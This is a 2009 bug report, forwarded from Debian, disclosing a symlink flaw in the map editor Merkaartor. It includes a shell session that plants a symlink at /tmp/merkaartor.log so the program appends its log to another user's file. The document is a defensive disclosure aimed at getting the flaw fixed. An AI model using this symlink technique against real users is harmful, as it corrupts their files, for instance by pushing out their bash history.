merkaartor: minor symlink attack #2320
Description
Reporter: bernd[at]bzed.de
[Submitted to the original trac issue database at 7.04am, Sunday, 27th September 2009]
[Forwarded from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548546]
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the user running merkaartor.
It may be used to DoS any applications that require their data files to
be valid before starting.
While no data loss is immediately obvious, it is possible that
corrupting files by appending data could lead other software to destroy
the newly corrupted data. An example of this could be bash. A merkaartor
log file can be fairly long if the user has enabled map tile downloads
and browses a large area and lots of tiles over one map editing session.
Merkaartor would append many lines to the user's bash history, and the next
time they start bash, their bash history could be larger than bash's
history limit settings; bash would then keep the latest lines (all
merkaartor logs) and discard the legitimate bash history.
Steps to reproduce:
pabs@chianamo:~/tmp$ sudo rm -f /tmp/merkaartor.log /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ sudo su -c 'ln -s /home/pabs/tmp/foo.log /tmp/merkaartor.log' nobody
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
ls: cannot access /home/pabs/tmp/foo.log: No such file or directory
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 189 2009-09-27 11:49 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ echo test > foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 194 2009-09-27 11:50 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log